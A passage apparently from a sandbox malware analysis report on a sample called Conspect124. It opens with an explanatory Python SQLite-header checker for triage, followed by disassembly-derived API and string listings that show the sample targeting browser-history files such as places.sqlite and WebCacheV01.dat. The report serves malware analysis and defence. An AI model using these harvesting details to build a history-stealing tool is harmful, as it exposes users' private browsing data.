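The three memcmp calls in the entry above identify a candidate database by its header; the 16-byte compare at 0041F22D is against the SQLite 3 magic string. As an added example (not code from this report, from Joe Sandbox, or from the analysed sample), the Python below reproduces that check and goes one step further than the malware does: it decodes the page size, change counter and page count from the 100-byte SQLite header and validates the constant bytes, so a triage script can tell a real browser store (places.sqlite and the like) from a file that merely starts with the magic string. The sample header bytes are constructed here; the field offsets follow the public SQLite file-format specification.

```python
from typing import Optional

# The 16-byte magic the function at 0041F22D compares with memcmp(..., 0x10).
SQLITE_MAGIC = b"SQLite format 3\x00"

# Constructed sample: the first 100 bytes (the SQLite header) of a database with
# 4096-byte pages, 12 pages and a change counter of 7. Not taken from the sample.
SAMPLE_DB_HEADER = (
    SQLITE_MAGIC
    + (4096).to_bytes(2, "big")        # offset 16: page size (big-endian)
    + bytes([1, 1, 0, 64, 32, 32])     # offsets 18-23: versions, reserved, fixed 64/32/32
    + (7).to_bytes(4, "big")           # offset 24: file change counter
    + (12).to_bytes(4, "big")          # offset 28: database size in pages
).ljust(100, b"\x00")


def parse_sqlite_header(buf: bytes) -> Optional[dict]:
    """Return header fields if buf starts with a plausible SQLite 3 header, else None.

    Mirrors the 16-byte magic check, then validates the fields the malware's
    memcmp never looks at, so a file that only carries the magic string is rejected.
    """
    if len(buf) < 100 or buf[:16] != SQLITE_MAGIC:
        return None
    page_size = int.from_bytes(buf[16:18], "big")
    if page_size == 1:          # spec: the value 1 encodes a 65536-byte page
        page_size = 65536
    # Page size must be a power of two between 512 and 65536.
    if page_size < 512 or page_size > 65536 or page_size & (page_size - 1):
        return None
    if buf[21:24] != bytes([64, 32, 32]):   # constant bytes in every valid header
        return None
    return {
        "page_size": page_size,
        "change_counter": int.from_bytes(buf[24:28], "big"),
        "db_pages": int.from_bytes(buf[28:32], "big"),
    }


def classify(buf: bytes) -> str:
    """Label a buffer the way a triage script would: 'sqlite' or 'other'."""
    return "sqlite" if parse_sqlite_header(buf) is not None else "other"


if __name__ == "__main__":
    print(classify(SAMPLE_DB_HEADER), parse_sqlite_header(SAMPLE_DB_HEADER))
    print(classify(b"PK\x03\x04" + bytes(96)))
```

Run it over the first 100 bytes of each file in a user profile to list the SQLite stores the harvester would pick up; the extra field checks matter because a magic-only compare, as used by the sample, also matches decoys or truncated fragments.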
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.3215263179.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                       • Associated: 0000000B.00000002.3215263179.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                       • Associated: 0000000B.00000002.3215263179.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                       • Associated: 0000000B.00000002.3215263179.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: _wcsicmpqsort
                                      • String ID: /nosort$/sort
                                      • API String ID: 1579243037-1578091866
                                      • Opcode ID: a0f12cb90dd745c164ef67684cb79943b88980d13b6e843c418957b63f9314a7
                                      • Instruction ID: 59a4a6edbc2c6816dd96362f3638b70d105e8990563e463c72bda517b6347aa4
                                      • Opcode Fuzzy Hash: a0f12cb90dd745c164ef67684cb79943b88980d13b6e843c418957b63f9314a7
                                      • Instruction Fuzzy Hash: C8213770700201AFD714FB36C880E96F3AAFF58314F11012EE61897692DB39BC918B4A
                                      APIs
                                      • memset.MSVCRT ref: 0040E60F
                                      • memset.MSVCRT ref: 0040E629
                                        • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                        • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                        • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                        • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,0040DAEA,?,0040DBA1,00000000,?,00000000,00000208,?), ref: 00409B9C
                                      Strings
                                      • Microsoft\Windows\WebCache\WebCacheV24.dat, xrefs: 0040E66F
                                      • Microsoft\Windows\WebCache\WebCacheV01.dat, xrefs: 0040E647
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.3215263179.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                       • Associated: 0000000B.00000002.3215263179.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                       • Associated: 0000000B.00000002.3215263179.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                       • Associated: 0000000B.00000002.3215263179.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: memsetwcslen$AttributesFileFolderPathSpecialwcscatwcscpy
                                      • String ID: Microsoft\Windows\WebCache\WebCacheV01.dat$Microsoft\Windows\WebCache\WebCacheV24.dat
                                      • API String ID: 2887208581-2114579845
                                      • Opcode ID: 45b77cc57d7adabb6b76daf53bfb3be083a41c4971f5e6ab387fbe8a56a2d209
                                      • Instruction ID: 2f29c334d396001d9fe1cebc89c879271eb53039ccc8e03d5a3365d75131e7c5
                                      • Opcode Fuzzy Hash: 45b77cc57d7adabb6b76daf53bfb3be083a41c4971f5e6ab387fbe8a56a2d209
                                      • Instruction Fuzzy Hash: 66118AB3D4012C66EB10E755EC85FDB73ACAF14319F1408B7B904F11C2E6B89F984998
                                      APIs
                                      • FindResourceW.KERNELBASE(?,?,?), ref: 004148C3
                                      • SizeofResource.KERNEL32(?,00000000), ref: 004148D4
                                      • LoadResource.KERNEL32(?,00000000), ref: 004148E4
                                      • LockResource.KERNEL32(00000000), ref: 004148EF
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.3215263179.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                       • Associated: 0000000B.00000002.3215263179.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                       • Associated: 0000000B.00000002.3215263179.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                       • Associated: 0000000B.00000002.3215263179.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: Resource$FindLoadLockSizeof
                                      • String ID:
                                      • API String ID: 3473537107-0
                                      • Opcode ID: 6eac18842e5c85fe8f5858b83388748d76eef83a8f56414f10f835c55d74c1c4
                                      • Instruction ID: 8a72e2f5d7590eb6bb033c3ed88c96ec9d5eb8bcd973c23d1c6560583cb0a60d
                                      • Opcode Fuzzy Hash: 6eac18842e5c85fe8f5858b83388748d76eef83a8f56414f10f835c55d74c1c4
                                      • Instruction Fuzzy Hash: 0101D2727402156B8B294FB6DD4999BBFAEFFC6391308803AF809D6331DA31C851C688
                                      APIs
                                      Strings
                                      • only a single result allowed for a SELECT that is part of an expression, xrefs: 0043AAD3
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.3215263179.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                       • Associated: 0000000B.00000002.3215263179.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                       • Associated: 0000000B.00000002.3215263179.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                       • Associated: 0000000B.00000002.3215263179.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: memset
                                      • String ID: only a single result allowed for a SELECT that is part of an expression
                                      • API String ID: 2221118986-1725073988
                                      • Opcode ID: d115b1de85cb0c2c74241db9f2e26d4ca9f76d3b3ab36ed3aa85b1754c3cbe0d
                                      • Instruction ID: 0c5fbdb45af1b87466ede92b40025f4dfba1e1eb7e0419b48c64bc8603b8f36f
                                      • Opcode Fuzzy Hash: d115b1de85cb0c2c74241db9f2e26d4ca9f76d3b3ab36ed3aa85b1754c3cbe0d
                                      • Instruction Fuzzy Hash: 5D827A71608340AFD720DF15C881B1BBBE1FF88318F14491EFA9987262D779E954CB96
                                      APIs
                                      • ??3@YAXPAX@Z.MSVCRT(?,00000000,00412966,/deleteregkey,/savelangfile,?,?,?,?,00000002,?,0044688C,00000000,?,0000000A), ref: 004125C3
                                      • DeleteObject.GDI32(00000000), ref: 004125E7
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.3215263179.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                       • Associated: 0000000B.00000002.3215263179.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                       • Associated: 0000000B.00000002.3215263179.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                       • Associated: 0000000B.00000002.3215263179.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: ??3@DeleteObject
                                      • String ID: r!A
                                      • API String ID: 1103273653-628097481
                                      • Opcode ID: 35011d0761a793af9b86058f165b74ada9e8dfd6de6a99c5cda2ffee1e56a26e
                                      • Instruction ID: d381ae2e1f6c469d4091c7bd434485f036f098756071eb86a226830a39d2e28c
                                      • Opcode Fuzzy Hash: 35011d0761a793af9b86058f165b74ada9e8dfd6de6a99c5cda2ffee1e56a26e
                                      • Instruction Fuzzy Hash: 72E04F75000302DFD7115F26E400782B7F5FF85315F11455EE89497151EBB96164CE19
                                      APIs
                                      • ??2@YAPAXI@Z.MSVCRT(00000000,0040D142,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D0CC
                                      • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,0040D142,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D0EA
                                      • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00000000,0040D142,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D108
                                      • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00000000,00000000,0040D142,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D126
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.3215263179.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                       • Associated: 0000000B.00000002.3215263179.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                       • Associated: 0000000B.00000002.3215263179.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                       • Associated: 0000000B.00000002.3215263179.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: ??2@
                                      • String ID:
                                      • API String ID: 1033339047-0
                                      • Opcode ID: bb5a2cedd882201272bd117211a6380788fbbee7b2a1ea69d9384cb42441e8af
                                      • Instruction ID: 5f4fc1bc6a90e200713bb7744dd8ab6a017b0cf4e98027731d5581fdeff4b0c3
                                      • Opcode Fuzzy Hash: bb5a2cedd882201272bd117211a6380788fbbee7b2a1ea69d9384cb42441e8af
                                      • Instruction Fuzzy Hash: B00121B2A413005EEB7ADF38EE5772966A0AF4C351F01453EA246CD1F6EEF58480CB49
                                      APIs
                                        • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 004449E7
                                        • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 004449F8
                                        • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A09
                                        • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A1A
                                        • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A2B
                                        • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A3C
                                        • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A4D
                                      • memcmp.MSVCRT(?,0044EC68,00000010,?,00000000,?), ref: 00444BA5
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.3215263179.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                       • Associated: 0000000B.00000002.3215263179.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                       • Associated: 0000000B.00000002.3215263179.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                       • Associated: 0000000B.00000002.3215263179.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: AddressProc$memcmp
                                      • String ID: $$8
                                      • API String ID: 2808797137-435121686
                                      • Opcode ID: e80885fdbb6a557c0c44277052daa68a3f3074bd67b4db13da85d3ecc8de475b
                                      • Instruction ID: 2c4e4273d6b09173b98ec99ba1a72f96ebc6587eba5c15334d9e54441f883a66
                                      • Opcode Fuzzy Hash: e80885fdbb6a557c0c44277052daa68a3f3074bd67b4db13da85d3ecc8de475b
                                      • Instruction Fuzzy Hash: 04314171A00209ABEB10DFA6CDC1BAEB7B9FF88314F11055AE515A3241D778ED048B69
                                      APIs
                                        • Part of subcall function 0040E01E: OpenProcess.KERNEL32(00000040,00000000,00000000,00000104,?,00000000,00000104,?,00000000,00000104,00000000), ref: 0040E093
                                        • Part of subcall function 0040E01E: GetCurrentProcess.KERNEL32(?,80000000,00000000,00000000), ref: 0040E0B2
                                        • Part of subcall function 0040E01E: DuplicateHandle.KERNELBASE(?,00000104,00000000), ref: 0040E0BF
                                        • Part of subcall function 0040E01E: GetFileSize.KERNEL32(?,00000000), ref: 0040E0D4
                                        • Part of subcall function 0040E01E: CreateFileMappingW.KERNELBASE(?,00000000,00000002,00000000,00000000,00000000), ref: 0040E0FE
                                        • Part of subcall function 0040E01E: MapViewOfFile.KERNELBASE(00000000,00000004,00000000,00000000,00000104), ref: 0040E113
                                        • Part of subcall function 0040E01E: WriteFile.KERNELBASE(00000000,00000000,00000104,0040E6A3,00000000), ref: 0040E12E
                                        • Part of subcall function 0040E01E: UnmapViewOfFile.KERNEL32(00000000), ref: 0040E135
                                        • Part of subcall function 0040E01E: CloseHandle.KERNELBASE(?), ref: 0040E13E
                                      • CloseHandle.KERNELBASE(000000FF,000000FF,00000000,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E582
                                        • Part of subcall function 0040E2AB: memset.MSVCRT ref: 0040E380
                                        • Part of subcall function 0040E2AB: wcschr.MSVCRT ref: 0040E3B8
                                        • Part of subcall function 0040E2AB: memcpy.MSVCRT(?,-00000121,00000008,Function_0004E518,00000000,00000000,74DF2EE0), ref: 0040E3EC
                                      • DeleteFileW.KERNELBASE(?,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E5A3
                                      • CloseHandle.KERNEL32(000000FF,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E5CA
                                        • Part of subcall function 0040E175: memset.MSVCRT ref: 0040E1BD
                                        • Part of subcall function 0040E175: _snwprintf.MSVCRT ref: 0040E257
                                        • Part of subcall function 0040E175: free.MSVCRT ref: 0040E28B
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.3215263179.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                       • Associated: 0000000B.00000002.3215263179.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                       • Associated: 0000000B.00000002.3215263179.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                       • Associated: 0000000B.00000002.3215263179.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: File$Handle$Close$ProcessViewmemset$CreateCurrentDeleteDuplicateMappingOpenSizeUnmapWrite_snwprintffreememcpywcschr
                                      • String ID:
                                      • API String ID: 1979745280-0
                                      • Opcode ID: db5b060151050967cb8a3560fbfd23956168ef1b290a982d56d7add8c3b4651d
                                      • Instruction ID: 90d235a97b45fa8760f9e747b2c38a4e83ddeae1161d8ec943a7631d31c9d9e7
                                      • Opcode Fuzzy Hash: db5b060151050967cb8a3560fbfd23956168ef1b290a982d56d7add8c3b4651d
                                      • Instruction Fuzzy Hash: DA312CB1C00618ABCF60DF96CD456CEF7B8AF44318F1006AB9518B31A1DB755E95CF58
                                      APIs
                                        • Part of subcall function 00418680: GetFullPathNameW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186AC
                                        • Part of subcall function 00418680: malloc.MSVCRT ref: 004186B7
                                        • Part of subcall function 00418680: free.MSVCRT ref: 004186C7
                                        • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                                      • GetDiskFreeSpaceW.KERNELBASE(00000000,?,00000200,?,?,?,00000000,?,00000000), ref: 004187D2
                                      • GetDiskFreeSpaceA.KERNEL32(00000000,?,00000200,?,?,?,00000000,?,00000000), ref: 004187FA
                                      • free.MSVCRT ref: 00418803
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.3215263179.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                       • Associated: 0000000B.00000002.3215263179.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                       • Associated: 0000000B.00000002.3215263179.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                       • Associated: 0000000B.00000002.3215263179.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: DiskFreeSpacefree$FullNamePathVersionmalloc
                                      • String ID:
                                      • API String ID: 1355100292-0
                                      • Opcode ID: 7494654f5416982ac8b8eb6095e1b911d56786f256e13b4958c27deb7a97d588
                                      • Instruction ID: 9f5aa8738ec5ca8fa6c7af21032fcab0d24b7c3e7281463e4f88d86f77cdc7da
                                      • Opcode Fuzzy Hash: 7494654f5416982ac8b8eb6095e1b911d56786f256e13b4958c27deb7a97d588
                                      • Instruction Fuzzy Hash: 2A218776904118AEEB11EBA4CC849EF77BCEF05704F2404AFE551D7181EB784EC58769
                                      APIs
                                        • Part of subcall function 00403BED: memset.MSVCRT ref: 00403C09
                                        • Part of subcall function 00403BED: memset.MSVCRT ref: 00403C1E
                                        • Part of subcall function 00403BED: wcscat.MSVCRT ref: 00403C47
                                        • Part of subcall function 00403BED: wcscat.MSVCRT ref: 00403C70
                                      • memset.MSVCRT ref: 00403A55
                                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                        • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                        • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                        • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,0040DAEA,?,0040DBA1,00000000,?,00000000,00000208,?), ref: 00409B9C
                                        • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                                        • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A908
                                        • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A92B
                                        • Part of subcall function 0040A8D0: memcpy.MSVCRT(?,?,000000FF,00000001,?,00000000,?,?,0040AD76,?,000000FF), ref: 0040A94F
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.3215263179.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                       • Associated: 0000000B.00000002.3215263179.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                       • Associated: 0000000B.00000002.3215263179.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                       • Associated: 0000000B.00000002.3215263179.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: memsetwcscatwcslen$free$AttributesFilememcpywcscpy
                                      • String ID: history.dat$places.sqlite
                                      • API String ID: 2641622041-467022611
                                      • Opcode ID: 4ee3c1f855ed567974f8c38ae52f347571c4e2ef0f255528624b3fdde4aab0c5
                                      • Instruction ID: 4d52d99a2018a06e8b3479be55870673e402391ac5db5fe9af26a684ed702786
                                      • Opcode Fuzzy Hash: 4ee3c1f855ed567974f8c38ae52f347571c4e2ef0f255528624b3fdde4aab0c5
                                      • Instruction Fuzzy Hash: CA112EB2A0111866DB10FA66CD4AACE77BCAF54354F1001B7B915B20C2EB3CAF45CA69
                                      APIs
                                        • Part of subcall function 00417570: SetFilePointer.KERNELBASE(?,?,?,00000000), ref: 00417591
                                        • Part of subcall function 00417570: GetLastError.KERNEL32 ref: 004175A2
                                        • Part of subcall function 00417570: GetLastError.KERNEL32 ref: 004175A8
                                      • ReadFile.KERNELBASE(?,?,?,?,00000000), ref: 0041761D
                                      • GetLastError.KERNEL32 ref: 00417627
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.3215263179.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                       • Associated: 0000000B.00000002.3215263179.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                       • Associated: 0000000B.00000002.3215263179.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                       • Associated: 0000000B.00000002.3215263179.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: ErrorLast$File$PointerRead
                                      • String ID:
                                      • API String ID: 839530781-0
                                      • Opcode ID: 43cd8d8e6b63bda72f55cb56ee55d1ec8e5478229177a04f989a23650c495d71
                                      • Instruction ID: c9208e3d43fc8ff2949f7201360c8f82def2114e122364bdeb0a9035ecfb973e
                                      • Opcode Fuzzy Hash: 43cd8d8e6b63bda72f55cb56ee55d1ec8e5478229177a04f989a23650c495d71
                                      • Instruction Fuzzy Hash: D001A236208204BBEB008F69DC45BDA3B78FB153B4F100427F908C6640E275D89096EA
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.3215263179.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                       • Associated: 0000000B.00000002.3215263179.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                       • Associated: 0000000B.00000002.3215263179.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                       • Associated: 0000000B.00000002.3215263179.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: FileFindFirst
                                      • String ID: *.*$index.dat
                                      • API String ID: 1974802433-2863569691
                                      • Opcode ID: 357f5a483d779ef34e4c4d87daa9b3f5529f5b59003a03b6604f1343cb38d30a
                                      • Instruction ID: 5c3219b8572ff4376619b1de75d6d1d1b7443a793578eadcc31bed7d77429009
                                      • Opcode Fuzzy Hash: 357f5a483d779ef34e4c4d87daa9b3f5529f5b59003a03b6604f1343cb38d30a
                                      • Instruction Fuzzy Hash: 0E01257180125895EB20E761DC467DF766C9F04314F5002FB9818F21D6E7389F958F9A
                                      APIs
                                      • SetFilePointer.KERNELBASE(?,?,?,00000000), ref: 00417591
                                      • GetLastError.KERNEL32 ref: 004175A2
                                      • GetLastError.KERNEL32 ref: 004175A8
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.3215263179.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000B.00000002.3215263179.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                      • Associated: 0000000B.00000002.3215263179.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                      • Associated: 0000000B.00000002.3215263179.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: ErrorLast$FilePointer
                                      • String ID:
                                      • API String ID: 1156039329-0
                                      • Opcode ID: cc1ef3dda130daf7e478d1b1942235eaeedb2679cbd5ead2c00b98c40fc327c6
                                      • Instruction ID: d6bca62a971eeae6b8c8b5ba9af71e52dcee60bc35e592f51b1cb5e4efccb3e3
                                      • Opcode Fuzzy Hash: cc1ef3dda130daf7e478d1b1942235eaeedb2679cbd5ead2c00b98c40fc327c6
                                      • Instruction Fuzzy Hash: 03F03071918115FBCB009B75DC009AA7ABAFB05360B104726E822D7690E730E9409AA8
                                      APIs
                                      • CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,02000000,00000000,00000000,00000000,004039CA,00000000,?,00000000,?,00000000), ref: 0040A044
                                      • GetFileTime.KERNEL32(00000000,00000000,00000000,?), ref: 0040A058
                                      • CloseHandle.KERNELBASE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,004455D5), ref: 0040A061
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.3215263179.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000B.00000002.3215263179.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                      • Associated: 0000000B.00000002.3215263179.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                      • Associated: 0000000B.00000002.3215263179.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: File$CloseCreateHandleTime
                                      • String ID:
                                      • API String ID: 3397143404-0
                                      • Opcode ID: 6d8e9772f553e0f6d6fb1ff05c82d92c5ca35a40b5ea430072252ef77abff331
                                      • Instruction ID: 1a7e7c0172e67e076cb3c0c47f72e507911c66c01d2121fa3096849e88919459
                                      • Opcode Fuzzy Hash: 6d8e9772f553e0f6d6fb1ff05c82d92c5ca35a40b5ea430072252ef77abff331
                                      • Instruction Fuzzy Hash: 23E04F3624036077E2311B2BAC0CF4B2E69FBCBB21F150639F565B21E086704915C665
                                      APIs
                                      • GetTempPathW.KERNEL32(00000104,?,00445FAE), ref: 00409A5C
                                      • GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409A6E
                                      • GetTempFileNameW.KERNELBASE(?,0040B827,00000000,?), ref: 00409A85
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.3215263179.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000B.00000002.3215263179.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                      • Associated: 0000000B.00000002.3215263179.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                      • Associated: 0000000B.00000002.3215263179.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: Temp$DirectoryFileNamePathWindows
                                      • String ID:
                                      • API String ID: 1125800050-0
                                      • Opcode ID: 18925d4506bf85468b003a70c2eb1ed6509d95f01bdd5ff44bce1f80956a42fa
                                      • Instruction ID: b144c37017a21c6b5a3d1d2b3cfc872714830df517851edcd0bc871ed666fd71
                                      • Opcode Fuzzy Hash: 18925d4506bf85468b003a70c2eb1ed6509d95f01bdd5ff44bce1f80956a42fa
                                      • Instruction Fuzzy Hash: ACE0927A500218A7DB109B61DC4DFC777BCFB45304F0001B1B945E2161EB349A848BA8
                                      APIs
                                      • Sleep.KERNEL32(00000064), ref: 004175D0
                                      • CloseHandle.KERNELBASE(?,00000000,00000000,0045DBC0,00417C24,00000008,00000000,00000000,?,00417DE1,?,00000000), ref: 004175D9
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.3215263179.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000B.00000002.3215263179.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                      • Associated: 0000000B.00000002.3215263179.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                      • Associated: 0000000B.00000002.3215263179.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: CloseHandleSleep
                                      • String ID: }A
                                      • API String ID: 252777609-2138825249
                                      • Opcode ID: d8d89497e8f27404fcbaadc135fdc6127e9b1f5305c348180eeea445c8f3bba2
                                      • Instruction ID: 75b622f9be81829505acbf4f2e76dfbd2ea822dc2a3448742147a61f3b6dc806
                                      • Opcode Fuzzy Hash: d8d89497e8f27404fcbaadc135fdc6127e9b1f5305c348180eeea445c8f3bba2
                                      • Instruction Fuzzy Hash: B7E0CD3B1045156ED500577DDCC099773E9EF892347144226F171C25D0C6759C828524
                                      APIs
                                      • malloc.MSVCRT ref: 00409A10
                                      • memcpy.MSVCRT(00000000,00000000,00000000,00000000,?,0040A9F2,00000002,?,00000000,?,0040AD25,00000000,?,00000000), ref: 00409A28
                                      • free.MSVCRT ref: 00409A31
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.3215263179.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
